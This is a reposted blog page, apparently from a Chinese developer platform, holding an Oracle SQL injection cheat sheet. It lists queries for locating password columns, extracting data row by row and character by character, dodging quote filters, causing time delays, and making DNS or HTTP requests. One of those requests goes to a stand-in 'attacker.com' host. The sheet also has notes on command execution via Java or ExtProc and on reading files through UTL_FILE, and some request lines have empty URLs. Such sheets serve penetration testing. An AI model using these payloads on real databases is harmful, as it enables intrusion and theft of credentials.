oracle cheatsheet,Oracle SQL Injection Cheat Sheet

最新推荐文章于 2023-04-14 09:42:45 发布

weixin_39523835

最新推荐文章于 2023-04-14 09:42:45 发布

阅读量51

点赞数

文章标签： oracle cheatsheet

Find Tables From Column Name--------------

SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; -- NB: table names are upper case

Select Nth Row-------------------------

SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; -- gets 9th row (rows numbered from 1)

Select Nth Char

SELECT substr('abcd', 3, 1) FROM dual; -- gets 3rd character, 'c'

Bitwise AND

SELECT bitand(6,2) FROM dual; -- returns 2

SELECT bitand(6,1) FROM dual; -- returns0

ASCII Value -> Char-------------

SELECT chr(65) FROM dual; -- returns A

Char -> ASCII Value---------

SELECT ascii('A') FROM dual; -- returns 65

Casting---------------------------------

SELECT CAST(1 AS char) FROM dual;

SELECT CAST('1' AS int) FROM dual;

String Concatenation-------------------

SELECT 'A' || 'B' FROM dual; -- returns AB

If Statement--------------------------------

BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; -- doesn't play well with SELECT statements

Case Statement-------------

SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- returns 1

SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2

Avoiding Quotes ------------------

SELECT chr(65) || chr(66) FROM dual; -- returns AB

Time Delay ---------------------------

BEGIN DBMS_LOCK.SLEEP(5); END; -- priv, can't seem to embed this in a SELECT

SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- if reverse looks are slow

SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- if forward lookups are slow

SELECT UTL_HTTP.REQUEST('') FROM dual; -- if outbound TCP is filtered / slow

-- Also see Heavy Queries to create a time delay

Make DNS Requests---------------------------------

SELECT UTL_INADDR.get_host_address('google.com') FROM dual;

SELECT UTL_HTTP.REQUEST('') FROM dual;

Command Execution--------------------------------

Java can be used to execute commands if it's installed.

ExtProc can sometimes be used too, though it normally failed for me. :-(

Local File Access----------------------------

UTL_FILE can sometimes be used. Check that the following is non-null:

SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';

Java can be used to read and write files if it's installed (it is not available in Oracle Express).

Hostname, IP Address-----------

SELECT UTL_INADDR.get_host_name FROM dual;

SELECT host_name FROM v$instance;

SELECT UTL_INADDR.get_host_address FROM dual; -- gets IP address

SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- gets hostnames

Location of DB files---------------

SELECT name FROM V$DATAFILE;

weixin_39523835

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
oracle cheatsheet,Oracle SQL Injection Cheat Sheet

Find Tables From Column Name--------------SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; -- NB: table names are upper caseSelect Nth Row-------------------------SELECT ...
复制链接

扫一扫

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。